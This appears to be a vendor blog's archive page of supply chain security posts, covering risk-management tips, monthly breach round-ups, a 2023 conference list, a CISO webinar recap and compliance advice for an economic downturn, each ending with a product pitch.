Category Archives: Supply Chain Security

Finally: Practical Guidance for Supply Chain Risk Management

Businesses are being bombarded with warnings from a variety of sources regarding supply chain risk management – ranging from media organizations like Forbes, to analyst firms like Gartner, and even to the White House, which notes that “foreign governments and criminal syndicates are regularly seeking ways to compromise our digital infrastructure” through supply chain attacks.


However, actual advice for managing supply chain risks is harder to come by. Figuring out where risks lie and working to detect them is an exercise that often falls to individual businesses – which often struggle to put supply chain risk management into practice, given the fact that few organizations were closely focused on supply chain risks until just a couple of years ago, when incidents like the SolarWinds breach brought supply chain risks to the fore.


1. Optimize Supply Chain Visibility


The single most effective step businesses can take to manage supply chain risks is to achieve visibility into their supply chains. You can’t mitigate the risks you can’t see, and if you wait for the risks to impact your own IT environment, it’s too late to prevent them from causing a disruption.


That’s why you need visibility not only into where your software comes from, but also which checks and protections your software suppliers have in place. Believe it or not, vulnerabilities will come from your least expected vendors, and more often than not, your smaller vendors. When you identify vendors who fail to manage risks, you can remove them from your supply chain in order to protect your own organization. This is where continuous monitoring steps in and becomes invaluable to your team by getting ahead of issues before remediation steps are even needed. 


When it comes to supply chain visibility, the more information you have, the better. It’s often impossible to gain complete, definitive visibility into supply chain risks because the “probability and severity of many risks is difficult to ascertain,” as Tucker Bailey, McKinsey Partner notes. But the more information you have about who your suppliers are, how they build out their supply chain and which practices they follow to mitigate security risks, the greater your ability to find and respond to the most serious supply chain vulnerabilities


2. Build Supply Chain Risk Management Into Onboarding


While continuous visibility into the supply chain is one step toward identifying risks, it’s also important to establish a rigorous process for vetting vendors when you onboard them into your supply chain. Identify which specific security controls you expect vendors to have in place, then implement a process that assesses how well they adhere to those practices.


There is always a risk that vendors who meet your requirements during onboarding will become insecure over time, which is why you need to monitor continuously for new supply chain risks. The most common onboarding process would be to do an initial risk scan of the vendor and setting a score. However, the better and more effective method is to set a periodic scan that includes an action plan. 


But even with all these processes, it doesn’t mean you should skimp on vendor validation at onboarding time. Rooting out risky vendors before they even join your supply chain is more effective than identifying risks after the fact.


3. Plan For Supply Chain Changes


Actually removing risky vendors from a supply chain is hard to do if you depend on those vendors and have no alternatives.


That’s why it’s important to ensure that your supply chain is dynamic enough to accommodate sudden changes in vendors. Always have backup suppliers in mind to who you can turn to if you need to stop using one vendor due to cyber security risks.


Supply chains constantly fluctuate. Vendors that seem rock-solid one day may be in the news the next because they are the center of a major breach. You can’t control what your suppliers do, but you can control your ability to pivot to alternative suppliers quickly in order to mitigate supply chain risks.


4. Enforce Continuous Supply Chain Risk Management


Supply chain risk management should never be a one-and-done affair. Nor should you rely on periodic audits to find risks.


Instead, strive to monitor your supply chain continuously. Continuous monitoring means that you can identify vulnerable third-party software, as well as vendors who are no longer conforming to your security requirements, as soon as the risk emerges. That beats waiting until your next audit to identify a risk – or, worse, not identifying it at all because you vetted your suppliers initially and have no mechanism in place for determining when vendors who were once secure no longer are.


Ensure that the protections that your suppliers claim to have in place actually work. For example, as Jay Shaw explained during a recent LSEG event, don’t just take someone’s word for it that backups are in place. Instead, say “you’re going to get a phone call, And that phone call is going to say, ‘Bam, we’re now down, so do the backup plan. We want to see how long it takes you and how well it works.”


It might not be practical to vet every vendor in that way, but for high-stakes suppliers, it’s important to know that promises align with realities when it comes to supply chain security protections.


5. Automate Supply Chain Risk Management With Cyber Solutions


For most businesses, the rigorous, continuous supply chain monitoring and risk management practices described above are impossible to implement manually. They would require too much time, and too much effort on the part of employees who already have overfilled plates.


That’s why it’s critical to leverage cyber solutions that automate supply chain risk management. They can identify multiple types of threat within third-party software – including malware, phishing risks, ransomware and beyond – without requiring manual vetting. And they can do this continuously so that you’re aware immediately when a new risk arises.


Automated cyber solutions have the added benefit of reducing the risk of human error. Your supply chain management tools will operate consistently and reliably, enforcing the same assessment policies over each and every vendor. Humans typically don’t achieve that level of consistency, which means that manual supply chain assessment increases the chances that risks will fall through the cracks.

How Findings can help

As a fully automated platform for identifying and managing risks across your supply chain, Findings makes it easy to put supply chain risk management practices into operation. Findings delivers centralized, continuous visibility into supply chains across any industry, enabling businesses to find and respond to risks before they turn into cyber security incidents.


See for yourself by requesting a demo at Findings.co.

November Security Breach Round Up

November security breach round up

From grocery stores, to banks, and everything in between – November saw it all when it came to breaches. As I mentioned in September, hackers are not picky. Let’s just say, when an opportunity arises, they will swoop right in and overtake your systems and access any data they can get their e-hands on.

 

Be careful, and keep staying informed – our goal is to make sure no company ends up on this list next month. 

 

Let’s dive in. 

 

  1. WhatsApp


Whatsapp with this?! The app that we all know, love, and use, WhatsApp, has supposedly fallen victim to a massive data leak. And by massive, I mean nearly 500 million user records have been leaked online. So… what happened? On November 16, 2022, an ad on a well-known hacking community forum was posted by someone claiming to be selling a 2022 database of WhatsApp user mobile numbers. It is also claimed that 32 million users from the United States have been included. Although only phone numbers were leaked, it is important to note that leaked phone numbers are typically used for marketing purposes, phishing, impersonation, and fraud. 

 

  1. Bed Bath & Beyond

Ah, phishing at its finest. While almost anyone who enters Bed Bath & Beyond can get lost for hours browsing, no one likes hearing about breached data. The United States retail giant confirmed that unauthorized access to company data was accessed after an employee was phished. In an 8-K filing to the U.S Securities and Exchange Commission, Bed Bath & Beyond explained that data of the employee’s hard drive and other shared drives that the employee had access to were accessed. The company is still investigating whether the drives have any sensitive or personally identifiable information.

 

  1. DropBox


File hosting service, DropBox, also fell victim to a phishing incident. In a statement from the company, they explained the situation saying “We were recently the target of a phishing campaign that successfully accessed some of the code we store in GitHub. No one’s content, passwords, or payment information was accessed, and the issue was quickly resolved. Our core apps and infrastructure were also unaffected, as access to this code is even more limited and strictly controlled. We believe the risk to customers is minimal. Because we take our commitment to security, privacy, and transparency seriously, we have notified those affected.” The company goes on to explain that on October 14, GitHub alerted them that suspicious behavior was going on. DropBox found that a threat actor was pretending to be CircleCI and was able to access one of DropBox’s GitHub accounts. To date, their investigation has found that the code accessed by the threat actor contained some credentials, primarily, API keys used by Dropbox developers.

 

  1. TransUnion


Isn’t it ironic how an agency who determines your credit score, is the one that could be ruining your credit? There are three main credit bureaus in America – Experian, Equifax and TransUnion. Unfortunately, the consumer credit reporting agency, TransUnion, experienced a breach and began notifying individuals about the incident on November 7,2022. The company collects and assembles information on over 1 billion consumers worldwide, 200 million of those being Americans. The type of information that was exposed includes names, social security numbers, driver’s license numbers, and account numbers. 

 

  1. AirAsia


AirAsia, the largest airline in Malaysia with approximately 22,000 employees and worldwide operations, has unfortunately fallen victim to a supposed ransomware attack. The group behind this attack is known as the Daixin Ransomware Gang and they have supposedly stolen data of 5 million AirAsia passengers and employees. The Daixin team is known for disrupting operations with ransomware and stealing personally identifiable information. With this data, the cyber threat group threatens to release the stolen information unless a ransom is paid. In a tweet shared by Soufiane Tahiri, screenshots from the group can be seen that were posted on the dark web. The information applies to both employees and passengers. In these documents, information such as date of birth, country of birth, where the person is from, start of employment for employees and their secret question and answer used to secure their accounts could be found. 

 

  1. Sonder


In a company security update, Sonder, a hospitality company, notified the public that they became aware of unauthorized access to one of its systems that included guest records. Information that was accessed includes: 

  • Sonder.com username and encrypted password

  • Full name, phone number, date of birth, address, and email address

  • Certain guest transaction receipts, including the last 4 digits of credit card numbers and transaction amounts

  • Dates booked for stays at a Sonder property

  • Government issued identification such as driver’s licenses or passports

 

  1. Sobeys

This incident shows that ANY business can get breached. Even a supermarket. Incase you aren’t familiar, Sobeys is one of the two national grocery retailers in Canada. On November 7, 2022, Sobeys’ parent company wrote in a notice that the grocery stores were impacted by an IT systems issue. While the company hasn’t publicly confirmed a cyber attack on its systems, a local media outlet reported that “two provincial privacy watchdogs said they had received data breach reports from Sobeys. Both Quebec’s access to information commission and Alberta’s privacy commission have both been notified by the grocer about a “confidentiality incident.” 

 

  1. Whoosh

Russian scooter sharing company known as Whoosh has confirmed that it too was breached. Hackers started to sell a database containing the details of 7.2 million customers on a hacking forum. Alleged stolen data on the hacking forum allegedly contains promotion codes that would allow someone to access the service for free, as well as partial user identification and payment card data. Included were email addresses, phone numbers, and first names. A russian news outlet, RIA Novosti was told by Whoosh that, “The leak of some of the personal data of customers of the Russian scooter rental service Whoosh at the beginning of November did indeed occur, but did not affect sensitive user data, such as access to accounts, transaction information or travel details” 

 

  1. Coinsquare:


Cryptocurrency is a sexy industry to talk about, but this incident is a little less appealing. To round up the month, a Canadian cryptocurrency exchange, Coinsquare has become the latest victim of a security breach. Data such as customer names, email addresses, residential addresses, phone numbers, dates of birth, device IDs, public wallet addresses, transaction history, and account balances were compromised. According to customer reports, Coinsquare allegedly contacted them via email and let them know that it had identified an intrusion and a database containing personal information accessed by an unintended third party. In a Tweet responding to an account sharing about the hack, Coinsquare wrote, “We have no evidence any of this information was viewed by the bad actor, but in an abundance of caution, we wanted to make our users aware. We notified all clients, but only identified 3 clients whose accounts were accessed.” 



Companies can get careless when it comes to securing their systems, their employees, and their customers. And while we are here to help you, the first step begins with you staying informed. Which we see you are since you made it this far! 


We’re here to help you. Contact us today

Your 2023 Supply Chain Security Conference Rundown

2023 supply chain security conferences

As every supply chain security and cyber security professional knows, there’s no such thing as taking a break from learning. Threats and cyber criminals are constantly evolving, and the only way to protect your organization and vital infrastructure is to stay one step ahead, by learning from the experiences, innovations, and insights of other experts. 

 

Here are the top supply chain security and cyber security conferences happening around the world this year, so open your calendar and plan your schedule now! 

 

1. Cybertech Global TLV

January 30 – February 1, 2023

Tel Aviv, Israel

Cybertech Global brings together top thought leaders from around the globe to share ideas and make connections about everything cyber. The three-day conference is an opportunity to hear from experts in the Middle East and beyond on the latest innovations, solutions, and emerging threats in the realm of cyber and supply chain security.

 

Speakers include Yodfat Buchris, Managing Director of Blumberg Capital, Yaroslav Rosomakho, Field CTO of Netskope, Eyal Cohen, CEO and Co-Founder of Cognifiber and many many more.

 

2. The Official Cyber Security Summit

February 10, 2023

Atlanta GA, USA

This one-day summit is short but impactful, offering an intensive day of learning about how to protect your business and networking with C-suite and senior executives. With keynote presentations from IBM Security and Huntress, it’s not one to miss. Schedule your trip now to attend sessions, swap ideas, and view demos of new solutions.  

 

3. CISO Sydney 2023

February 20-22, 2023

Sydney, Australia

The first CISO Sydney conference to take place in person since before the pandemic is packed full of informative sessions and networking opportunities. CISOs from numerous companies will join together to share intelligence, renew connections, and discover new approaches, methodologies, and tech products. The conference also features a focus day on Critical Infrastructure and DevSecOps. With a generous mix of focused talks, panel discussions and group discussions, there’s sure to be many points of interest for you. You can view the agenda here.

4. Women in Cyber Security (WiCyS)

March 16-18, 2023

Denver CO, USA

The Women in Cyber Security (WiCyS) conference is an event that strengthens the community of women working in cyber security while enabling attendees to connect, learn, and discover new concepts. This organization has been around for a decade and is dedicated to advancing the role of women in the field of cyber security. 

 

This event is focused on opportunities for women but is open to all genders. The conference includes resume clinics, mock interviews, and a career fair as well as workshops, keynote sessions, and lightning talks. 

 

5. Pharma Supply Chain & Security World 2023

March 28-29, 2023

London, UK

With counterfeiting on the rise, pharma companies are more concerned than ever with supply chain security and ensuring traceability and visibility. This year’s Pharma Supply Chain and Security World summit is rightly focusing on new solutions to ‘Building Resilient Pharma Supply Chain’, ‘Serialization and Track & Trace’, ‘Smart Packaging & Labeling’, and ‘De-Risking Supply Chain, Compliance and Contracts’. Speakers include Fausto Artico, Global R&D Tech Head and Director of Innovation and Data Science with GSK and Gianpiero Lorusso, Director, Head of Upstream Logistics with Healthcare Business of Merck. 

 

6. Third Party Vendor Risk Management for Financial Institutions

12-14 April, 2023

New York, NY, USA

This  three-day supply chain security conference is aimed at executives and cyber security heads who are concerned about minimizing supply chain risk. This year, the conference focuses on ideas and tools for monitoring third and fourth parties, increasing visibility into your extended supply chain, and improving risk management. 

 

7. RSA Conference 2023

April 24-27, 2023

San Francisco, CA, USA

The theme for this year’s RSAC is Stronger Together, with an emphasis on sharing information, ideas, and even failures. The RSA Conference offers four days of rich learning opportunities, including hands-on learning labs and Capture the Flag events, as well as keynotes and panel discussions, alongside an deas EXPO which can be explored in person or online. 

 

8. RiskWorld

April 30-May 3, 2023

Atlanta, GA, USA

The annual RiskWorld event is intended for everybody delivering risk management services, from across verticals and around the world. The conference offers four days of networking, insights, solutions, and educative sessions led by risk management leaders and disrupters.

 

Tracks for the event include Career Development, Cyber and Technology Risk, Risk Modification/Mitigation and Loss Control and many more. Register your interest to receive the agenda when it it released!

 

9. Cyber Security and Privacy Professionals Conference

May 1-3, 2023

Bellevue, WA, USA

A highly education-focused conference for cyber security and privacy professionals, this event offers opportunities for attendees to learn and discuss new challenges, emerging threats, and nascent solutions for their fields. The agenda will be released in early 2023, but if the 2022 agenda is anything to go by, this is not to be missed!

 

10. IMPACT 2023

May 3-4, 2023

Jersey City, NJ, USA

Run by the Ethics & Compliance Initiative (ECI), IMPACT 2023 opens up educational and networking sessions for everyone interested in compliance, regulatory policy, and enforcement. Leading experts and policy makers will share their ideas around strategy, risk, accountability, and ESG across sectors and verticals. Make sure to click through and sign up to their mailing list to be notified when early bird pricing drops! 

 

11. Third Party & Supply Chain Cyber Security Summit

May 4-5, 2023

Barcelona, Spain

Focusing on end to end cyber security practices, this year’s Summit brings together the latest case studies on cyber security implementation for discussion by professionals from leading companies. It’s a great opportunity to learn more about visibility, risk management, and supply chain security across your network. Some of the speakers you have to look forward to include Syed Ubaid Ali Jafri, Head of Cyber Defense & Offensive Security at Habib Bank Limited and Andrea Szeiler, Global CISO for Transcom Worldwide AB.

 

12. Gartner Supply Chain Symposium / Xpo

May 8-10, 2023

Orlando, FA, USA

As you’d expect, the Gartner Supply Chain Symposium brings together some of the top names in supply chain security to explore and investigate big ideas, small details, and actionable insights. The symposium aims to address new and existing disruptions, resilient strategies, and tech investments to minimize risk and maximize rewards. Join David Gonzalez, Conference Chair and VP Analyst and get ready to develop agile and resilient supply chain strategies, learn how to mitigate risk and respond to disruption, how to pursue digital initiatives that drive business growth, and so much more!

 

13. Black Hat Asia

May 9-12, 2023

Marina Bay Sands, Singapore

Black Hat trainings, briefings, and seminars are highly respected events, and Black Hat Asia is no exception. Held over four days in Singapore, Black Hat Asia 2023 invites all cyber security professionals to learn from researchers, educators, and experimenters in all the fields of cyber security and risk. 

 

14. American Supply Chain Summit

May 16-16, 2023

Dallas, TX, USA

The American Supply Chain Summit is one of the top supply chain security conferences for leaders and executives, bringing together supply chain security chiefs from leading brands like IKEA, Unilever, and Kroger to share case studies, swap methodologies and strategies, and prepare to meet the next threat. Key themes this year include profitability and risk management, cost optimization, workforce management, and disruptive supply chain tech. Key speakers include Chuck Graham, VP of Microsoft Cloud Sourcing, Tanja Dysli, Chief Supply Chain Officer for IKEA and Supply Chain and Andrew Rendich, Chief Supply Chain Officer for Peloton Interactive.

 

15. 2023 FINRA Annual Conference

May 16-18, 2023

Washington, DC, USA

Located this year in the Marriott Marquis in Washington, the annual FINRA conference is a highly-regarded opportunity for cyber security, supply chain security, and risk management professionals to learn about current trends and regulatory issues that affect their roles. Speakers come from both the public and private sector as well as academia. 

 

16. Cybertech Asia 2023

May 2023

Marina Bay Sands, Singapore

Cybertech Asia returns this year, after the 2022 conference had to be postponed due to COVID-19 restrictions. Expectations are high and preparations have been lengthy for this highly anticipated event! Participants can look forward to in-depth discussion about cyber threats and solutions across the sector, including an extensive exhibition center for multinational companies and SMBs alike.

 

17. Gartner Security & Risk Management Summit

June 5-7, 2023

National Harbor, MD, USA

Aimed at CISOs, risk management leaders, and people in various cyber security positions, the Gartner Security & Risk Management Summit is an arena for learning new ways to protect your organization while making new connections and discovering new insights. Get ready to hear the latest insights from Gartner’s top VP Analysts, such as Patrick Hevesi and Christie Struckman.

 

18. International Conference on Cyber Security and Resilience (ICCR2023)

July 17-18, 2023

Digital

The ICCR is a research-focused conference that brings together leading scholars and researchers to share their work and ideas about cyber security and resilience. Although it’s aimed at academics, security professionals can learn valuable insights and practical solutions to cyber security, supply chain security, and risk management challenges. 

 

19. Black Hat USA

August 6-11, 2023

Las Vegas, NV, USA / Virtual

Black Hat USA is one of the few cyber security conferences in 2023  that’s still striving to offer a rich hybrid experience. The six-day event includes four days of live, interactive and hybrid trainings, as well as a two-day hybrid conference including keynote speakers and panel discussions to be announced at a later date.

 

20. National Cyber Summit

September 20-21, 2023

Huntsville, AL, USA

The National Cyber Summit bills itself as the most innovative cyber security-technology event in the US, with a range of focus areas, leading speakers, and unique collaborative opportunities. The agenda and speakers are yet to be announced but you can view previous years on the event website and sign up for notifications for when tickets go on sale. 

 

21. InfoSec World

September 25-27, 2023

Lake Buena Vista, FL, USA

Now in its 28th year, this year’s InfoSec World offers an opportunity to meet and learn from CISOs and business security experts from a diverse range of top brands, including the NFL, Salesforce, and Carnegie Mellon University. Conference themes include Critical Infrastructure, Hackers & Threats, Identity, and Risk Mitigation, so there’s something to suit everyone. 

 

22. International Cyber Expo

September 26-27, 2023

London, UK

The International Cyber Expo brings together cyber security experts from a range of sectors, including government officials, CISOs, and leading university researchers. Cyber security and supply chain security professionals will take away plenty of new ideas, solutions, and insights so make sure to register your interest ahead of time. 

 

23. Cybertech Europe

October 3-4, 2023

Rome, Italy

Cybertech Europe offers an opportunity to listen to experiences, research, and case studies from leading cyber security experts in the public and private sectors. Attendees can join keynote sessions, workshops, and panel discussions on a broad range of topics. 

 

24. Cyber Security World Asia

October 11-12, 2023

Marina Bay Sands, Singapore

 

Cyber Security World Asia is a headline event, bringing together thought leaders from top technology companies across Asia to swap intelligence and strategies and present their innovations. They strive to lead the charge in addressing the most pertinent and compelling issues in cyber security so they should definitely be one to add to your calendar for 2023.

 

25. Insider Threat Summit

Date TBC

Location TBC

The Insider Threat Summit aims to raise the standard of cyber security across all industries and around the world by working together. It focuses on vulnerability, security, and risk management, with a number of government officials among the speakers and attendees. 

 

 

Phew! There is a lot of incredible events coming up in 2023 and you’ll definitely see our Findings team across the globe speaking at a number of these events. Make sure to bookmark this page and check back for discount codes on tickets throughout the year. 

Waiting for that next conference and eager to learn more about automating your supply chain security? Request a demo.

The New Breed of Cyber Security Threats Coming for CISOs in 2023

The New Breed of Cyber Security Threats Coming for CISOs in 2023

Traditional challenges, like ransomware and software supply chain threats, have not gone away. But as we enter 2023, they’re being exacerbated by additional challenges, such as government-sponsored cyberattacks, the increased number of supply chain attacks, new types of phishing exploits and even the possibility that quantum computers will totally invalidate most of the core cyber security tools that businesses rely on today.

 

Those and other trends were the subject of an excellent webinar hosted recently by the London Stock Exchange Group (LSEG), moderated by Charles Clarke, Head of Security Architecture at LSEG, which brought together industry leaders including:

  • Kobi Freedman, CEO and cofounder of Findings.
  • Reuven Aronashvili, founder and CEO of CYE.
  • Alan Platt, COO at CyberHive.
  • Jay Shaw, CEO of Praxonomy.
  • Alan Moffat, CISO & Director of Business and Cyber Security Services for Sapphire.

 

This diverse mix of companies and sectors, spent the morning discussing what they see as the most pressing cyber security challenges for 2023 and beyond. Although their insights gave CISOs – and businesses in general – plenty of problems to worry about, they also pointed toward solutions that forward-thinking organizations should be adopting in order to protect their operations against cyberthreats.

 

Key Cyber Security Trends for 2023

Although there was consensus that major trends in cyber security for 2023 will vary somewhat between different industries, the overall takeaway from speakers’ comments was that 2023 will see the continued emergence of a new breed of cyber security threats – or new takes on familiar ones.

 

Quantum Computing

Quantum computers – which use quantum mechanics to supercharge the processing of data – have been in the news for a long time as scientists come closer to developing quantum machines that are actually usable for real-world tasks.

 

As Alan Platt pointed out, the fact that quantum computing isn’t practical today doesn’t mean businesses shouldn’t be aware of the potential concerns. The reason why is that the sensitive data that businesses are generating today and protecting using encryption may become readable by quantum computers a few years from now.

 

“Most of the internet at the moment runs on RSA-2048 public key cryptography,” Platt said. “Breaking that using a conventional computer is estimated to take about 13.7

billion years, but a quantum computer doing exactly that same piece of cryptography would be able to crack it in just 42 minutes.”

 

The point here is that, in the not-so-distant future, security practices that CISOs rely on today to secure sensitive data may become obsolete. They’ll need to work even harder to prevent sensitive information from falling into the wrong hands in the first place, because even if the data is encrypted, quantum computers may be able to defeat the encryption with ease.

 

Increased State-Sponsored Cyberattacks

Platt also warned that the days may be coming to an end where malicious hackers seeking financial gain are the only people out to ruin a CISO’s day. Increasingly, he said, “the name of the game is about tightening security…against more complex and more damaging attacks that could take out critical infrastructure” – as opposed to threats like ransomware, which can be financially harmful but don’t usually impact physical infrastructure.

 

This new challenge reflects an increase in cyberattacks by nation-state actors seeking to use cyberwarfare as a means of harming their enemies. Although that practice is not completely new, the war in Ukraine has demonstrated an eagerness by both sides to extend traditional war into the cyber realm, heightening the security challenges faced not just by governments, but also individual businesses, who may be targeted by state-sponsored actors in order to harm countries in which businesses are based.

 

Lingering Covid Security Challenges

The Covid pandemic may effectively be over, but its impact on supply chain security and cyber security is not, according to Alan Moffat.

 

Covid forced companies to invest more of their IT spending in technologies that enable remote work and distributed workforces, as a result “less budget can be put into cyber security.” Due to the speed that companies had to be ready for the work-from-home/hybrid working models, mistakes in the initial set up are still being shored up by security leaders. These challenges are exacerbated by the fact that remote work infrastructure is often harder to secure because it involves IT assets that exist beyond a company’s corporate firewall and network, and lack the type of physical security protections that exist in a traditional office environment.

 

This means that CISOs need to do even more with even less budget – which makes strategies like automation and early detection of threats more important than ever.

 

Looking for a step-by-step VDP security roadmap? We’ve got you covered

 

VPNs Are No Longer Up To Snuff

Although VPNs – which are intended to protect sensitive data by encrypting packets as it flows between central IT infrastructure and remote locations, like the PCs used by workers who operate from outside the office – don’t make networks less secure, they don’t necessarily make them more secure, either. Beyond the risk that quantum computers, as noted above, could be used to break the cryptographic keys that secure VPN traffic, VPNs are complicated to administer, and they can cause problems for remote users who need to access business resources (like SaaS platforms) that aren’t actually hosted on the corporate network.

 

Instead of placing blind trust in VPNs, companies should be turning to other strategies – like zero-trust access controls – to secure their networks. Zero trust works even in a world where quantum computing may kill cryptography as we know it.

 

New Types of Supply Chain Security Threats

Supply chain security challenges have received a lot of attention in recent years, and many CISOs have begun investing in initiatives to protect their supply chains, as well as to disclose supply chain vulnerabilities efficiently. But they need to do a lot more, according to Kobi Freedman, CEO and CoFounder of Findings, to get a real handle on the risk.

 

“Looking forward, we see a dramatic increase in attacks which are driven by the IoT” and that target “IoT and industrial environment” systems, our CEO added. Supply chain security strategies that address just the conventional elements of the software supply chain – like server-side applications – aren’t enough. Businesses also need to be able to understand and secure their IoT and operational technology assets.

 

Kobi added that businesses need what he called “long-tail” visibility into the supply chain. He was referring to the ability to understand not just which suppliers a business depends on directly, but also who supplies them, and how supplier relationships evolve over time. Simply compiling a software bill of materials and calling it a day won’t be enough to achieve the deep visibility necessary to secure modern supply chains.

 

And businesses will need to do all of this, Kobi pointed out, with budgets that are likely to remain constrained at least through 2023. As a result, they’ll need to make heavier use of supply chain security automation than ever.

 

Read here: All you’ve ever wanted to know about Vulnerability Disclosure Programs (VDPs)

 

Evolving Phishing Threats

Kobi Freedman also pointed out that the nature of phishing attacks is changing. Businesses have seen an increase in targeted phishing initiatives, known as spear phishing attacks, that target high-level employees rather than ordinary, in-the-trenches workers. These attacks are more sophisticated, resulting in higher levels of success.

 

To correct against this, businesses need to understand that humans are often the weakest link in cyber security. “90% of the risk for spear phishing attacks and other exploits comes from the human factor in the organization,” he said. The more businesses know about what their employees have access to, the better they can defend against risks like spear phishing.

 

Thriving In The Face Of 2023 Cyber Security Challenges

Faced with threats like these – as well as traditional challenges, like ransomware – what’s a CISO to do?

 

Part of the answer, the panelists agreed, is to transform cyber security within their organizations from a cost center to a “business enabler,” as Reuven Aronashvili put it. In other words, CISOs should strive to demonstrate to other executives how investments in cyber security can save money by reducing the risk of revenue loss due to IT disruptions. Viewed from that perspective, it’s easier to explain and justify continued spending on initiatives like supply chain security, even in financially tight times.

 

Relatedly, CISOs should align their agendas with overall business needs. That strategy will help to achieve even more buy-in for cyber security investment from a board. One way to do that is by focusing on how cyber security can increase overall visibility into the organization. Cyber security tools protect all parts of the IT estate and extend to all facets of the business, which makes them an excellent resource for understanding what is happening across the company as a whole. They’re not just ways to identify threats, but to gain end-to-end visibility, which businesses can in turn leverage to support continued investment in cyber security initiatives.

 

“What are my crown jewels? What are the lines of business that we need to defend? How will that translate into direct investments into tools and technologies and projects and processes and so on” to keep assets safe? Those are the types of questions CISOs should be asking to keep cyber security in alignment with broader business needs, our CEO said.

 

Planning For Breaches

Beyond the issue of investing in cyber security, Freedman underlined the importance of also ]actively preparing for breaches. After all, it’s not a matter of if a breach will occur, but when. No matter how many fancy, next-gen cyber security tools you deploy, it’s likely that you will be attacked successfully at some point.

 

Preparation against this risk starts with ensuring that the basic tools and protections are in place to detect attacks and begin the response process. From there, CISOs should ensure that their organizations can execute mitigation plans that minimize the impact of a breach. They should also practice addressing the root cause of attacks in order to identify and shut down  breaches as quickly as possible.

 

The Changing Role Of The CISO

Ultimately, the net result of the new generation of cyber security challenges that businesses face is that the role of the CISO is changing. Today, the CISO is not just someone who has the last word on cyber security. Instead, as Aronashvili put it, the CISO is now “the middleman between the technical teams and management,” which means that CISOs need to get buy-in from other executives in order to deploy effective cyber security strategies.

 

To that end, CISOs must now focus on communicating the value of cyber security to management. They need to show that cyber security spending actually saves money, and that security doesn’t just support, but actually enables, the operations of the business as a whole.

 

Preparing For The Future With Findings

As CISOs grapple with a new wave of cyber security threats, one challenge they shouldn’t struggle to solve is supply chain security. Findings delivers end-to-end visibility into supply chain security risks and compliance by automatically compiling a profile of your business’s supply chain and helping you understand where your supply chain security challenges lie. No matter how complicated supply chain security may become, Findings makes it easy to conquer the challenge.

 

See for yourself by requesting a demo at Findings.co.

Supply Chain Compliance Strategies for an Economic Downturn

Supply-Chain-Economic-Downturn

Economists debate whether stubbornly high inflation, combined with interest rate hikes by central banks, have actually created a recession.

But what’s not up for debate are the ways in which the current economic downtown complicates supply chain management. From less consistency within the supply chain, to fewer available resources for manually tracking supply chain compliance issues, the economic environment is imposing significant challenges on businesses. 

 

The Economy’s Impact on Compliance and Security

Economic uncertainty affects supply chain compliance initiatives in many ways – some obvious, and some less so.

 

1. The Bullwhip Effect and Lower Profitability

One of the most significant impacts results from what economists call the bullwhip effect. The term refers to the way in which mistaken assumptions about consumer demand tend to reverberate across the supply chain. For instance, if suppliers interpret a temporary uptick in demand for a product as a permanent trend, they may overinvest in production of the product. In turn, suppliers will then experience lower profit margins because they end up having to sell the product for less, due to lower-than-anticipated demand. Many economists blame the bullwhip effect as one reason why inflation has surged and corporate profits have dropped.

From the perspective of supply chain compliance, the bullwhip effect means that organizations across the supply chain face especially high pressure to squeeze profits out of their products in any way they can – including cutting corners, in some cases. For example, software companies may skimp on security monitoring or trade compliance for their products, placing organizations within their supply chain at risk. This makes the ability to detect supply chain compliance issues more important than ever in the present economic climate.

 

Read here: All you’ve ever wanted to know about Vulnerability Disclosure Programs (VDPs)

 

2. Labor and Fuel Cost Increases Across the Supply Chain

Factors like higher labor costs in regions where suppliers could historically find cheap workers  and the increased cost of fuel only exacerbate the challenges faced by organizations. 

It’s not only product manufacturers who are impacted by higher costs for labor and fuel. These costs flow down the supply chain to affect organizations of all types. A company that develops software is likely paying more for the hardware its developers use, due to the increased labor and shipping costs associated with producing that hardware. So the software company, too, is squeezed by economic challenges that don’t relate directly to software production.

 

 

3. Skimping on Cyber Insurance

The third trend that impacts supply chain compliance – and one that is easy to overlook – are the lower rates of cyber insurance uptake.

In good economic times, organizations would buy cyber insurance in a bid to protect themselves against cyberattacks. Such insurance doesn’t always guarantee solvency following an attack, but it may help in certain situations.

“Insurers have also been hit by the downturn, says Peter Mansfield, a partner at Reynolds Porter Chamberlain in London. “Policyholders will look to make savings, which may include buying less insurance or better insurance.

With less money to spend, organizations choose to forgo cyber insurance or purchase less comprehensive coverage. In doing so, they place not only themselves, but also companies within their supply chain, at risk. A software company that suffers a cyberattack and doesn’t have sufficient insurance to recover will go out of business, leaving its products unsupported and insecure – a major risk for customers of those products.

 

Read here: Cyber insurance is great but you need to invest in additional tools that help detect and respond to risks

 

Supply Chain Compliance Opportunities

The good news is that it’s possible to get ahead of supply chain compliance issues by taking advantage of tools that can manage supply chain risk efficiently, regardless of the economic environment.

A healthy supply chain compliance strategy for the economic downturn hinges on visibility. Visibility into how your supply chain works and how it impacts your organization is critical for making informed decisions about supply chain compliance issues. It can also help companies manage costs. As Ed Winterschladen, executive vice president Europe at Proxima, puts it, “In a volatile supply market, running towards cheaper options won’t necessarily deliver value – identifying waste and spending better will prove more effective than reducing costs in areas of essential spend.”

Smart organizations will achieve the visibility they need using AI tools. With the help of AI tools, companies can “make supply chain planning and sourcing more cost efficient through real-time analytics and insights to help drive efficiency and productivity through its supply chain,” according to GEP. GEP also reports that two-thirds of executives identify enhanced supply chain visibility as a top priority for mitigating disruptions in 2022.


The value of improved supply chain visibility extends beyond controlling costs and supply chain compliance issues. It’s also a way of demonstrating to partners, investors and customers that your organization can thrive through times of challenge. As Accenture notes, “Consumers, investors, governments and communities may ultimately judge companies on how they respond to this period of disruption.

 

Harden your supply chain against uncertainty

In short, now is the time for organization’s to invest in efficient, comprehensive supply chain visibility and risk management. The threat of non-compliance within supply chains increases during times of economic uncertainty. AI-assisted supply chain visibility solutions make this challenge easy to meet without breaking the bank or burdening risk management teams with manual effort.


Contact Findings to learn more about how we can help protect your supply chain – in both the best and worst of economic times.

October Security Breach Round Up

October was Cyber Security Awareness Month, and yet, another month, another breach. In a month that is geared towards helping organizations protect themselves, large companies have yet again fallen victim to these heinous attacks. One after the other, many companies and their consumers are now wondering when these breaches will stop. 

 

Here are our top October 2022 know-worthy incidents:

 

Toyota:

    • Toyota is no stranger to data breaches. And by the looks of it, it seems as though the company hasn’t learned from past mistakes (remember the 2019 breach that affected over 3 million of Toyota’s customers?). On October 7, 2022, Toyota issued an apology after nearly 300,000 people who used T-Connect, a telematics service that connects vehicles via a network, were exposed. The Japanese car giant explained that personal data was leaked when an access key was publicly made available on GitHub for almost five years. Email addresses and customer control numbers may have been exposed since 2017.


